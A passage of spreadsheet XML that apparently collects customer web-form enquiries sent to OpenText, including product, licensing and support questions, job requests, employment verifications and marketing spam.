_x000D_
Thank you</t>
  </si>
  <si>
    <t>Need to know the details of OpenText integration with existing DotNet application</t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
Im going to do a OpenText presentation for some clients of mine which will include 2 aspects. _x000D_
 _x000D_
Some specific product license – I don’t know it there is any “do’s and don’t’s” ? _x000D_
And then license programs. Discount levels and agreement type. EULA and so forth…. _x000D_
_x000D_
Could you guide me to such information?? _x000D_
_x000D_
_x000D_
OpenText software:_x000D_
•	OpenText Core_x000D_
•	IXOS,_x000D_
•	ReadSoft,_x000D_
•	Rightfax,_x000D_
•	StreamServer_x000D_
•	LiveLink_x000D_
_x000D_
_x000D_
_x000D_
Looking forward to hear form you. _x000D_
Thanks!_x000D_
Br. Joakim</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have completed the OpenText Content Suite Platform (formerly CLM) - Sales 101 and the status is still reflecting in progress on the landing page complete under learning central and it did not update my score which was 80. _x000D_
_x000D_
Please help._x000D_
_x000D_
Kind regards,_x000D_
Lungi</t>
  </si>
  <si>
    <t>Do you have solution for protection of music and video files and if yes, how much it costs. Thank you!!!</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
How are you? Hope you are fine. _x000D_
_x000D_
I quite often visit your website. During the analysis, I have found out that there are few things need to be done for better performances in Google ranking and Conversion Rate/ Bounce Rate Improvement for your website._x000D_
_x000D_
One the issues /problems - LOADING SPEED DEVELOPMENT._x000D_
_x000D_
In late 2010, Google publicly announced that site speed was a new signal introduced into their organic search ranking algorithm. _x000D_
_x000D_
Though, it was not powerful factor/signal then but in 2013 SPEED DEVELOPMENT has become one of the major signals to get higher ranking in search engine and improve the bounce rate. We recommend your website should be loading within 2 seconds in Mobile or Tablet or Desktop._x000D_
_x000D_
Here are some Stats on the Importance of the Loading Speed:_x000D_
&gt;&gt; 73% of mobile internet users say that they’ve encountered a website that was too slow to load. _x000D_
&gt;&gt; 51% of mobile internet users say that they’ve encountered a website that crashed, froze, or received an error. _x000D_
&gt;&gt; 38% of mobile internet users say that they’ve encountered a website that wasn’t available. _x000D_
&gt;&gt; 47% of consumers expect a web page to load in 2 seconds or less. _x000D_
&gt;&gt; 40% of people abandon a website that takes more than 3 seconds to load. _x000D_
&gt;&gt; 1-second delay in page response can result in a 7% reduction in conversions. _x000D_
&gt;&gt; If an e-commerce site is making $100,000 per day, a 1-second page delay could potentially cost you $2.5 million in lost sales every year._x000D_
_x000D_
Here we are offering LOADING SPEED IMPROVEMENT service to our clients to Improve followings -_x000D_
&gt;&gt; Google spider Crawl Rate Improvement_x000D_
&gt;&gt; Improvement on Google Indexing_x000D_
&gt;&gt; Google Search Ranking Position Improvement_x000D_
&gt;&gt; Conversion of Traffic_x000D_
&gt;&gt; Traffic Bounce Rate Improvement_x000D_
&gt;&gt; User Experience Improvement_x000D_
_x000D_
We are the professionals who can help your website to improve its loading speed. During the process, we use the following tools and go through every page and fix all the errors. _x000D_
&gt;&gt; Google Page Speed Insi</t>
  </si>
  <si>
    <t>i want brava redar saft were</t>
  </si>
  <si>
    <t>I am assessing the capability of opentext product to implement BPM/Case Management system in my company to manage policy lifecycle from new business all the way to claim._x000D_
_x000D_
We have our own life admin system, imaging system and data capture technology. The backend database primarily is SQL Server and Oracle._x000D_
_x000D_
Our web service primarily are SOAP/XML and HTTPS/JSON._x000D_
_x000D_
Our triggering point usually is email or phone call from customer. We also want to have notification mechanism to keep policy holder and agent up to date during the execution of the case or process._x000D_
_x000D_
Just want to see how well Opentext can provide the integration we need in order to implement the solution._x000D_
_x000D_
Hope to hear from you</t>
  </si>
  <si>
    <t>I am a second year Computer Science student at the University of Waterloo looking for an exciting job for my next term. Is OpenText hiring students for any programming or QA jobs for fall 2017? (September-December)_x000D_
Thank you</t>
  </si>
  <si>
    <t>One of customers has informed me that OpenText has now taken support back in-house. A call with the previous support contact at Bluelink confirms this._x000D_
Bluelink were previously working with Telstra on a SIP to enable VOIP so we could move a server with a physical fax card to a VM with a soft fax into a DXC (ex-HPE) data centre._x000D_
Can you tell me who we can now contact regarding a SIP?</t>
  </si>
  <si>
    <t>I worked for NYC Transit before joining BART, and I worked with the OpenText product for Operations Planning.  I was wondering if you will be able to demonstrate something similar for SF BART for Ops Planning.  You may contact me on phone or email._x000D_
_x000D_
Sam</t>
  </si>
  <si>
    <t>I want to talk with someone who can tell me the prices of Birt IHub full edition, thanks</t>
  </si>
  <si>
    <t xml:space="preserve">IDF has created an ECM RFP and would like OpenText to participate. </t>
  </si>
  <si>
    <t>I would like information on Documentum as a Document Control program that allows drawings to be checked out to and returned from clients and tracked through version control. We need to be able to search the drawings for content so that clients get all the drawings and only the drawings that are applicable to the job they are doing. Only Document Control staff and fewer than 5 other staff would have access to the system so it is NOT Document Management throughout the company that we require. Could I get a brochure and licensing information please for the version of your many systems that most closely meets those requirements? I no longer recognize the Documentum system with which I am familiar as a librarian and document control practitioner so do not know what program to request information for._x000D_
Thanks</t>
  </si>
  <si>
    <t>My name is Shanika Davis with Carriers and Consumers. We are a professional fact finding organization, which represents a number of major corporations. One of our clients has requested to verify employment for Muneer Ahmed with your company, How can I obtain this information?</t>
  </si>
  <si>
    <t xml:space="preserve">EMPLOYMENT VERIFICATION_x000D_
Good Afternoon,_x000D_
_x000D_
My name is Janaia Braggs, and I represent Creative Services, Inc., a background screening firm in Massachusetts. I am contacting you with regards to an employment verification for Paul Tucker. Paul provided employment with your company from 1999 to 2002 and the job title as Regional Sales Manager. Specifically, are you able to confirm and/or provide the following information either via email or telephone?_x000D_
_x000D_
Dates of Employment:_x000D_
Job Title:_x000D_
Salary: _x000D_
Reason for Leaving:_x000D_
Eligibility for Rehire:_x000D_
_x000D_
If a specific person or department needs to be contacted, please let me know. I also have a signed consent form from this employee that I can forward upon request. Any and all information provided is greatly appreciated._x000D_
_x000D_
Thank you in advance,_x000D_
_x000D_
Janaia Braggs_x000D_
Investigator_x000D_
Creative Services, Inc._x000D_
p 508-339-5451 x231_x000D_
f  508-452-1302_x000D_
www.creativeservices.com_x000D_
 _x000D_
Not ALL background checks are created equal. _x000D_
Screen Smart.  Hire with Confidence.  Get the Advantage.   _x000D_
www.creativeservices.com_x000D_
This email contains privileged and confidential information for the intended recipient only. If you have received this communication in error, please notify sender immediately. Unauthorized use or distribution of this communication is prohibited.  The contents of this email should not be construed as legal advice or a legal opinion on any specific facts or circumstances. The contents are intended for general information purposes only, and you are urged to consult a lawyer concerning your own situation and any specific legal questions you may have._x000D_
_x000D_
 Please consider the environment before printing this email._x000D_
</t>
  </si>
  <si>
    <t>I have a customer using RightFax 10.6 with Exchange Server 2010.  They are moving to Exchange Server 2016, but I did not see that explicitly listed as a supported Exchange Server version in your documentation.  Is 10.6 compatible with Exchange Server 2016 or is there a required upgrade for this to work?</t>
  </si>
  <si>
    <t xml:space="preserve">looking for information/cost on getting setup with a Desktop Fax solution. We recently upgraded our phones to IP phones and we are now looking to upgrade our faxing. </t>
  </si>
  <si>
    <t>Hello,_x000D_
I have a bid for the product below, for The City of NY, if you can please assist. I am a reseller and am tax exempt._x000D_
_x000D_
SCPRFSTDSUPPORT - qty 1_x000D_
System covered is:_x000D_
_x000D_
04961-12230_x000D_
_x000D_
Enterprise Suite Server_x000D_
_x000D_
23 Additional channels_x000D_
_x000D_
Shared Services Module_x000D_
_x000D_
24 FoIP Upgrades_x000D_
_x000D_
SCPRFSTDSUPPORT - qty 1_x000D_
System covered is:_x000D_
_x000D_
97019-12154_x000D_
_x000D_
Enterprise Suite Server_x000D_
_x000D_
23 Additional channels_x000D_
_x000D_
Shared Services Module_x000D_
_x000D_
24 FoIP Upgrades</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I just wanted to check would you be interested to acquire email list of “Accounts/Finance Decision Makers” from your target region_x000D_
_x000D_
The name Few Titles: CAO, CFO, Accounting operations manager, Accounting analyst, Accounting admin/Associate/Specialist/Clerk, Director of accounting, Financial ops manager, VP of finance,  etc..,_x000D_
_x000D_
If so please let me know your target audience, I will accordingly get back to you with counts, samples and pricing details._x000D_
</t>
  </si>
  <si>
    <t>Buenas tardes,_x000D_
_x000D_
Necesito soporte con AplicationXtender worflow. _x000D_
Las principales dudas son: _x000D_
¿AX Workflow es compatible con MySQL?_x000D_
¿Cómo puedo obtener un Key Product de AX Workflow?_x000D_
_x000D_
Tenemos ciertos problemas relevantes con AX y nos gustaría saber con quién podemos hablar para solucionarlos._x000D_
_x000D_
Un Saludo,_x000D_
_x000D_
Stefano Mazzuka.</t>
  </si>
  <si>
    <t>Request information on jobs - Ref#: 14394</t>
  </si>
  <si>
    <t>I have been asked to gather initial information regarding ECM providers in the 2016 Gartner Magic Quadrant's "Leaders" Quadrant. Our company recently rebranded effectively merging several companies that were acquired. We are looking to consolidate multiple ECM processes more in keeping with our new global footprint, and this is the very early stages of that process.  We seek answers to some initial questions, including:_x000D_
1. What differentiates you from ECM offerings by Hyland and IBM? (I understand that you acquired Dell EMC's ECM division earlier this year? What did this acquisition give your company as compared to where you were prior to it, especially as it relates to the other players in this quadrant?_x000D_
2. Are your products offered using a SaaS model?_x000D_
3. Are your products able to be Cloud-based versus installed?_x000D_
4. What languages do your products support, and does this list include so-called multi-byte character languages?_x000D_
5. Can you provide any generic pricing so that we might have some idea of a starting point for budgetary purposes?  (I realize this is like throwing paint on the side of the barn given there are so many ways a company like ours might configure/use an ECM system, help us start to understand that and give us a cursory starting number for budgeting purposes like Hyland and IBM did.)</t>
  </si>
  <si>
    <t>Have a fax server but I am not happy with it. It seems to have trouble sending faxes</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I hope you are good today._x000D_
_x000D_
The reason of my email is to check whether you are interested in acquiring database of various SAP users mentioned below._x000D_
_x000D_
Human Resource Management (SAP HRM), also known as Human Resource (HR)_x000D_
Production Planning (SAP PP)_x000D_
Material Management (SAP MM)_x000D_
Financial Supply Chain Management (SAP FSCM)_x000D_
Sales and Distribution (SAP SD)_x000D_
Project System (SAP PS)_x000D_
Financial Accounting and Controlling (SAP FICO)_x000D_
Kindly let me know your requirements and I will forward more details for the same._x000D_
_x000D_
Best Regards,_x000D_
Happle Vegas_x000D_
Business Development Manager_x000D_
Email: happle@sublimedata.us_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please send the correct address to remit payments to? </t>
  </si>
  <si>
    <t>what is latest version of TD and what is latest version of AXIS2 component used in it if any._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>We are currently looking for a solution to merge the PDF or other document. Blazon is the one we choose. However we have a problem about the maximum size that Blazon server can merge. Please let me know any limitation about it. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, ich bin Mitglied im E-Justice-Programm Rheinland-Pfalz. Hier in der Gruppe Marktanalyse der in Bayern eingesetzten Software (Captiva 7.1). Um eine Aussage zur eingesetzten Software treffen zu können wäre es von Vorteil einen Ansprechpartner zu haben, der auch das Projekt in Bayern begleitete. Vielleicht können Sie uns hier weiterhelfen. Für eine baldige Kontaktaufnahme wäre ich Ihnen dankbar. Mit freundlichen Grüßen Schwarz _x000D_
Sehr geehrter Herr Schwarz,_x000D_
_x000D_
Vielen Dank für Ihre Anfrage bei EMC zum Thema Captiva._x000D_
Leider muss ich Ihnen mitteilen, dass EMC seine komplette Content Management Sparte, inklusive Documentum, Captiva etc an Opentext verkauft hat._x000D_
Bitte wenden Sie sich an Opentext._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
_x000D_
Susanne Krusemarck, Dipl.-Volksw_x000D_
</t>
  </si>
  <si>
    <t>User Requirement Specifiation</t>
  </si>
  <si>
    <t>Reseller needing to buy Brava! for our customer</t>
  </si>
  <si>
    <t>Hello,_x000D_
We're a software &amp; hardware distributor/reseller from Romania. You can see some details in our web store: www.e-rpd.ro_x000D_
I'm interested to sale your products family - RightFax, as well, so please send me the terms and conditions for resellers._x000D_
I'll wait your answer asap._x000D_
Best regards,_x000D_
_x000D_
Cristian Dragan_x000D_
RAPID PARCEL DELIVERY SRL_x000D_
CALEA VICTORIEI NR. 83-85, BL.B, SC.2, ET. 3, AP. 33, SECTOR 1_x000D_
BUCHAREST, ROMANIA - 010066_x000D_
MOB: 0722359410_x000D_
TEL.: 021 3127366_x000D_
FAX: 021 3127388_x000D_
www.e-rpd.ro</t>
  </si>
  <si>
    <t>Enquiry on existing Opentext environment migrating to cloud. Is there a guide on how this can be done ?</t>
  </si>
  <si>
    <t>What is the Price for GA Product User per Year?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are thinking about connecting Open Text and Salesforce for a project. _x000D_
_x000D_
I saw your app on the Appexchange and I have a few questions regarding how documents can be associated with products and the access we can have in Salesforce. _x000D_
_x000D_
When can we speak about that?_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Martin</t>
  </si>
  <si>
    <t>We interested in buying the RightFax Solution.  Do you have any partners in Jordan?  If so, please provide us with their contact number._x000D_
_x000D_
Sincerely,_x000D_
Wael Aburrub</t>
  </si>
  <si>
    <t>Wir suchen eine DMS-Lösung. Bitte um Kontaktaufnahme.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I tried to contact you last week regarding the manual of rightfax._x000D_
Can you please let me know of this request on your side ? :)_x000D_
Regards_x000D_
Christophe_x000D_
</t>
  </si>
  <si>
    <t>1. There is another territory in Australia and you do not have it in your drop down list: Australian Capital Territory, ACT. regrettably I had to select Victoria from your menu else your system does not work_x000D_
2. I would like to download the Gupta SQLBase documentation and I do not have all the information required by your site._x000D_
product: Gupta SQLBase_x000D_
End user : ACT Health_x000D_
name of co-worker: Mervyn Rose_x000D_
System ID : unknown</t>
  </si>
  <si>
    <t>The template creation functionality in ITG and PRO is not working in TeamSite._x000D_
_x000D_
To replicate the issue:_x000D_
1.	Navigate to //g1t6320.austin.hpicorp.net/iwadmin/main/livesite/template/WORKAREA/shared_x000D_
2.	File &gt; New Template_x000D_
3.	Error message will display</t>
  </si>
  <si>
    <t>We run Infor Movex/M3 and are in the process of upgrading Streamserve from version 3 to version 5.6.2.  We need a license file for v5.6.2 and I am wanting to find out how to obtain the licence file._x000D_
_x000D_
Thnaks_x000D_
_x000D_
Simon Boyd</t>
  </si>
  <si>
    <t>I think i have a new idea. It is so easy to apply. And every one or company work in construction filled will buy this system. _x000D_
_x000D_
I need to explain vai email._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>We aim to further evaluate your offering for a solution we are targeting. It would be great if we can connect over a call your morning either on Tuesday or Wednesday.</t>
  </si>
  <si>
    <t xml:space="preserve">Ladies And Gentlemen._x000D_
Moisés Tavares Anapaz, legal representative of the company GERZU-Comércio e Serviços, Lda., uniquely Angolan law, with headquarters in Cooperativa Lar do Patriota, Casa nº 857, Município de Belas, Luanda, Tax Payer or NIF nº 5417249653, Social Security contributor nº 1641081 and registered with the commercial registry of Luanda under the nº 92-13/131029, enjoy this opportunity to expose the following:_x000D_
The company in question has on your social object the sale of pharmaceutical products and all kinds of medical products._x000D_
In this context, we contacted them in order to send us as soon as possible listing, technical specifications, delivery and payment terms for "rapid tests for tuberculosis ", and:_x000D_
CDF (R 150mg+H 75mg+Z 400mg+E 275mg)= Rifampicina+Isoniazida+Pirazinamida+Etambutol;_x000D_
Rifampicin + Isoniazid + Pyrazinamide + Ethambutol;_x000D_
RH (R 150mg+H 75mg) =_x000D_
Rifampicina+Isoniazida;_x000D_
Rifampicin + Isoniazid_x000D_
RHE (R 150mg+H 75mg+E 275mg) =_x000D_
Rifampicina+Isoniazida+Etambutol;_x000D_
Rifampicina+Isoniazida+Etambutol_x000D_
S 1gr. = Estreptomicina (Ampolas de 1 Grama);_x000D_
S gram = Streptomycin (ampoules of 1 gram);_x000D_
Vit. B6 = Vitamina._x000D_
                Vitamin._x000D_
 Grateful for the attention._x000D_
 Thank you_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
Hello_x000D_
I'm work demand_x000D_
I hope to accept_x000D_
Yours sincerely reza_x000D_
</t>
  </si>
  <si>
    <t>need to pruchase the viwer , can you send us the quote for the above.</t>
  </si>
  <si>
    <t xml:space="preserve">for job purpose </t>
  </si>
  <si>
    <t>Rightfax services offline</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
Hope you are doing well_x000D_
_x000D_
We can fairly quickly promote your website to the top of the search rankings with no long term contracts!_x000D_
_x000D_
We can place your website on top of the Natural Listings on Google, Yahoo and Bing. Our Search Engine Optimization team delivers more top rankings then anyone else and we can prove it. We do not use "link farms" or "black hat" methods that Google and the other search engines frown upon and can use to de-list or ban your site. The techniques are proprietary, involving some valuable closely held trade secrets. _x000D_
_x000D_
Our prices are less then half of what other companies charge._x000D_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Sincerely,_x000D_
_x000D_
Bob Smith_x000D_
bobinternetmarketing@gmail.com_x000D_
_x000D_
COMPLETE INTERNET MARKETING SOLUTION_x000D_
SEO - PPC - SMO - Link Building - Copyright - Web Designing - PHP</t>
  </si>
  <si>
    <t>Hello,_x000D_
I wish to find out if your document management system can cater for the following requirements. Kindly respond ASAP as I have a short time frame to confirm that the solution I proffer can cater for requirements listed._x000D_
_x000D_
Electronic Document Management Systems Supplied should have at least 3 user concurrent capability for each location the system is deployed. The EDMS should have the following essential minimum support capability features: _x000D_
_x000D_
a) Ease of Use _x000D_
i) MS Outlook-style or equivalent user interface _x000D_
ii) Search-centric design (enabling users get their document in the fastest possible way) _x000D_
iii)Web Client with cross-browser support _x000D_
iv)Templates and Profiles for storing frequently used indexing data, scanner settings, export, etc. _x000D_
v) Built-in OCR that automatically indexes scanned documents. _x000D_
vi) Task-centric Help facility. _x000D_
_x000D_
b) Document Capture _x000D_
i) Batch scanning of documents. _x000D_
ii) High speed duplex scanning of different document sizes and thickness in same batch. _x000D_
iii) Monochrome and colour document capture. _x000D_
iv) Support for document separation features. _x000D_
v) Support for automatic capture of fax and e-mail documents. _x000D_
vi)Support for centralized and decentralized document capture. _x000D_
vii) Direct Adding of electronic documents and folders. _x000D_
viii) Drag and Drop documents, emails, fax and folders into EDMS database. ix)Drag and Drop text from documents into database. _x000D_
x) Drag and Drop images from web pages into database. _x000D_
xi)Import electronic documents and folders along with index data into database._x000D_
_x000D_
c) Document Management _x000D_
i) Ability to manage any form of digital documents, including a variety of image formats, textual and electronic files, digital audio/video formats._x000D_
ii) Create and manage Folders and Sub-folders. _x000D_
iii)Attach Tags for easy document identification. _x000D_
iv)Create and manage multiple Document Types. _x000D_
v) Create and manage multiple Document Stacks. _x000D_
vi)Create multiple Links between related Documents and Stacks. _x000D_
vii)</t>
  </si>
  <si>
    <t>Are webinars recorded?  My organization is beginning the process of looking at an accounts payable and OpenText integration and it appears there was a similar use case on a Webinar from 5/18/17.</t>
  </si>
  <si>
    <t xml:space="preserve">interested in learning more / starting dialogue about </t>
  </si>
  <si>
    <t>We are running RightFax 10.6.1.1108 and are upgrading to Exchange 2016. I know there is a RightFax email connector that needs to be in place and configured in the RightFax E-Mail Gateway Module. Where can I get the connector and information on installing it?_x000D_
_x000D_
Thank you_x000D_
Keith</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, our company has purchased 5 copies of Redact-It Desktop with OCR on Nov 20, 2015. We're now trying to activate the software on some of our new computers and we can't get to the old site to download our license file using the software ID and Software Pin. Please let me know our options. Thanks._x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in discussing about the updated database of Broadcast sectors? _x000D_
_x000D_
We have complete contact detailed of Director, CEO, CMO and other key decision makers from industries mentioned below who might be interested in your product and services._x000D_
_x000D_
Advertising, Audio &amp; Video Production, Broadcasting Stations, Cable &amp; Satellite Distribution, Consulting, Education &amp; Local Government, Installation, Manufacturing, Media &amp; Entertainment, Programming, Publishing, Radio Broadcasting, Retail &amp; Wholesale, Studio &amp; Equipment distributors, Systems Integrators, TV Broadcasting and many more._x000D_
_x000D_
Kindly let me know your target criteria so that i can provide you exact counts, cost and few free samples for your reference:_x000D_
_x000D_
Target Industry:_x000D_
Target job title:_x000D_
Target Geography:_x000D_
_x000D_
Regards,_x000D_
Amber Winters_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>We are trying to verify Employment for RICO, JAN CHRISTOPHER SAPALICIO	- ref 71497166</t>
  </si>
  <si>
    <t>Interested in Documentum Enterprise Archiving product.</t>
  </si>
  <si>
    <t>We just went to windows 10 and we are running HostExplorer 15.0.1.191.  When we do a Print Screen the printout is scrambled.  I saved the printout to a text file and noticed that it is using JPL XCPT and wondering if there as some trick I am missing to get the Print Screen working.</t>
  </si>
  <si>
    <t>I need a point of contact get a NDA established between our organizations. I tried calling your corporate office but those lines went to voicemail.</t>
  </si>
  <si>
    <t>Looking Business Architecture Solution</t>
  </si>
  <si>
    <t>Researching solutions for Fax Over IP to replace analog lines, provide central management, fax routing and users the ability to send and receive fax from their PC.</t>
  </si>
  <si>
    <t>We are a current customer. I am trying to determine who our current Account Rep is.</t>
  </si>
  <si>
    <t>I'm interested in the Exceed product to help manage our AIX servers across the WAN.  I'd like to run it on a trial basis to test before we make a purchase.  Is that something we can work out?</t>
  </si>
  <si>
    <t>I am interested in obtaining a contract application for my provider</t>
  </si>
  <si>
    <t>Hello, the reason i'm contacting you today is for an opportunity to sell our product to you. I see that you have a home decor section and I have a few products that I think would go very well with your stores. You can view our products at www.worldsourcepartners.com. Please contact me with any interest or questions you may have._x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>For job secure</t>
  </si>
  <si>
    <t>For job purpose</t>
  </si>
  <si>
    <t>I understand that OpenText has an MSA in place for Direct Hires.   We would welcome the chance to be considered as a Temporary and Contract Vendor.   Kindly provide details as to what that process involves.   Thank you in advance for your consideration.</t>
  </si>
  <si>
    <t>Need to talk to a sales person about getting DM and transferring our data from parent company</t>
  </si>
  <si>
    <t>We are interested in getting a DAM system.  Can someone email me  to set up a demo for both MediaBin and Media Management?</t>
  </si>
  <si>
    <t xml:space="preserve">Need to setup new password but the email to setup the password needs to be changed to someone else. </t>
  </si>
  <si>
    <t>We are looking for new processes for capturing, storage and accessing of the whole documents in the company.</t>
  </si>
  <si>
    <t>Would like to get information on pricing and demo eDocs for our law firm.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir setzen IXOS bereits als Archivlösung in Verbindung mit SAP ein. Für ein neues Projekt sind wir auf der Suche nach einer Software welche Dokumente auf dem Fileshare liest und diese automatisch mit dem eentsprechenden Objekt in SAP verknüpft und die Daten endgültig im Archiv ablegt._x000D_
_x000D_
Welche Möglichkeiten bietet Opentext in diesem Bereich?_x000D_
_x000D_
Vielen Dank für ihre Antwort._x000D_
Daniel Lang</t>
  </si>
  <si>
    <t>1. We want to know person contact for OpenText in Malaysia. _x000D_
2. The status of reseller company for OpenText, Jati tinggi sdn Bhd &amp; V-Global System Sdn Bhd, is it still your reseller company?</t>
  </si>
  <si>
    <t>eDocs for SharePoint, Legal transaction document management system</t>
  </si>
  <si>
    <t>Hi OpenText,_x000D_
_x000D_
I am UI/UX, web and mobile graphics designer and developer looking for work._x000D_
_x000D_
Examples of my work are below:_x000D_
http://hipinspire.com/_x000D_
_x000D_
Above you can find any kind of design work you need. My portfolio is the largest_x000D_
web design portfolio on the Internet. It contains 180 designs sorted under 35 categories. _x000D_
_x000D_
Best Regards,_x000D_
Marko Bijelic</t>
  </si>
  <si>
    <t>Our company is interested in finding out more about OpenText Email Archiving for Microsoft Exchange</t>
  </si>
  <si>
    <t xml:space="preserve">Hi OpenText_x000D_
Let me introduce my self, my name is Andri from PT Sarana Solusindo Informatika We are reseller company in Indonesia, our customer need Documentum, Exceed 3D, Exceed, Brava Desktop_x000D_
to fulfilled our customer needed, could you give us quotation price in $USD Currency?_x000D_
_x000D_
Please give us information about delivery, term of payment, product knowledge, etc_x000D_
_x000D_
Thanks &amp; Regards_x000D_
Andri_x000D_
</t>
  </si>
  <si>
    <t>Want to look up old drawings that relate to model trains that I have on the computer</t>
  </si>
  <si>
    <t>I would like to learn more about your BPM solutions' capabilities, and whether they match my client's needs.  There could be business opportunities if they do.  Please ask the local sales in Shanghai, China to contact me via email. Thanks!</t>
  </si>
  <si>
    <t>I am trying to register Imaging for Windows for a PC.  I tried to email the register.bat file to register14w@global360.com only to have it bounce back as invalid.  Please let me know how I can get this registered.  Thank you.</t>
  </si>
  <si>
    <t>I would like to speak with a representative in regards to hosting any Corporate Events, Product Launches, or Staff Parties in Canada. Please let me know if possible! Warmest Regards, Anthony</t>
  </si>
  <si>
    <t>We are looking to get a DAM System and are interested in setting up a DEMO.  We are also interested in OpenText MediaBin. If you offer demos, please email me to set a time so that I can coordinate with my Creative manager and IT.  Thank you!</t>
  </si>
  <si>
    <t>we have a few vendors that would like for us to use EDI. We are looking at 3rd parties to assist us with the translation.  We use Netsuite as our ERP system.</t>
  </si>
  <si>
    <t>Question about network version of DWG, DWF viewer. I was wondering if the network version means the licensing is based on concurrent users or if the license is tied to a specific PC? For example, if I get the 10 license version can I only install it on 10 PCs and only those 10 PCs can use the software OR can I install it on 30 PCs but only 10 people can use it at the same time? Thanks for your help!</t>
  </si>
  <si>
    <t>We are looking for software for the Legal Department to handle Matter, Document and Contract Management</t>
  </si>
  <si>
    <t>I was told by OpenText Support that "Since you will need to get a new license to add this feature to Redact-It desktop I would suggest to upgrade the software as you apply a license that allows for OCR." therefore I wanted to see how much that would cost?_x000D_
_x000D_
Thank you for your time</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I was trying to set up the XML Generator in the EDC Monitor on our rightfax server.  The samples seem to work however it isn't picking up faxes sent to the fax server.  Would you be able to send me an documentation on setting up the XML Generator Module to pick up faxes from the rightfax server?_x000D_
_x000D_
Thanks,_x000D_
Aaron Deobald</t>
  </si>
  <si>
    <t xml:space="preserve">Hello there, _x000D_
_x000D_
I am the global trade compliance analyst for Raytheon. _x000D_
_x000D_
I’m contacting your company to request the Export Control Classification Number (ECCN) for the OpenText Imaging Windows Viewer 9.7_x000D_
_x000D_
ECCNs are five character alpha-numeric designations used on the Commerce Control List (CCL) to identify dual-use items for export control purposes. An ECCN categorizes items based on the nature of the product, i.e. type of commodity, software, or technology and its respective technical parameters. They are used in determining whether an export license is needed from the Department of Commerce._x000D_
_x000D_
If you are unable to provide the ECCN, could you please provide the following information: _x000D_
1)	Is there any encryption utilized within the software? _x000D_
2)	Is there a log on/authentication process utilized to access the software? _x000D_
3)	If encryption, can it be changed easily by the user? _x000D_
_x000D_
If you are unaware of your ECCN for this product, please forward this email to your legal department. _x000D_
_x000D_
Your immediate response is very much appreciated. _x000D_
_x000D_
Thanks in Advance, _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">queremos informacion de actualizacion de teleform </t>
  </si>
  <si>
    <t>Invalid License</t>
  </si>
  <si>
    <t>We're in the process of upgrading RightFax in our environment and we're lacking the installer for 10.6 Feature Pack 3. Is there a link available for that download? We're migrating to Office 2016 at this time as well and, from what I understand, will need FP3 to maintain compatibility.</t>
  </si>
  <si>
    <t>We are a XEROX Concessionaire in Portugal. We have a customer with Right Fax. Who can we contact regarding updates of right fax?</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to speak to someone in your partner program about using OpenText in a number of opportunities that we have.   </t>
  </si>
  <si>
    <t>i pressed the reset password button on the catalog entry screen for my sock catalog (010003219367) and need to know where the password was emailed.  I need it to come to Jim.Henricks@hanes.com</t>
  </si>
  <si>
    <t>hi. i'm looking for a quote.  id like to be able to send faxes via email.  i have an infant so my preferred method of contact is email._x000D_
_x000D_
thank you</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Avez-vous des éléments bloquant ou des points faibles majeurs qui freinent votre référencement naturel ?_x000D_
_x000D_
Cette semaine, nos experts SEO analysent gratuitement les sites Internet pour répondre à cette question._x000D_
_x000D_
En tant que sous-traitant pour les agences web européennes et canadiennes nous avons déjà effectué des milliers d’audits et nous connaissons toutes les techniques de référencement naturel._x000D_
_x000D_
Le référencement naturel est de plus en plus complexe car Google ne cesse de modifier son algorithme. Ce qui fonctionnait bien hier ne fonctionne plus aujourd’hui et peut même entraîner une pénalité Google dans certains cas._x000D_
_x000D_
Souhaitez-vous bénéficier de notre expertise pour auditer votre site afin de répondre à cette question primordiale ?_x000D_
_x000D_
« Avez-vous des éléments bloquant ou des points faibles majeurs qui freinent votre référencement naturel ? »_x000D_
_x000D_
Nous restons dans l’attente de votre feu vert pour lancer l’étude de votre site._x000D_
_x000D_
Restant à votre entière disposition._x000D_
_x000D_
Bien cordialement,_x000D_
Anthony NAMPOINA_x000D_
Marketing Wholesaler Website_x000D_
ID SKYPE: W2CONTACT_x000D_
Paris, France / Téléphone: +331 78 90 06 06_x000D_
Antananarivo, MADAGASCAR / Téléphone: +261 3402 54437_x000D_
www.wholesaler-website.com_x000D_
Lot IPA 14 bis Ambohidahy Itaosy_x000D_
anthony@wholesaler-website.com</t>
  </si>
  <si>
    <t xml:space="preserve">i tested your demo, and like it,   i need to install it on our treasurers pc (she does the redacting) but it complained to me about to many installs, oops,  i need info on purchasing and a demo version for her computer,   thank you , curt </t>
  </si>
  <si>
    <t xml:space="preserve">We want to contact a Solution Consultant or Professional Service which may advice or implement the best solution for us to implement a SAML 2 connection through the OTDS (OpenText Directory Service) </t>
  </si>
  <si>
    <t>Would like a Demo of Secure MFT and DM 16</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
im Zuge einer aktuellen Evaluierung in Bezug auf Merchandise Management sind wir auch auf Ihre Produkte aufmerksam geworden._x000D_
_x000D_
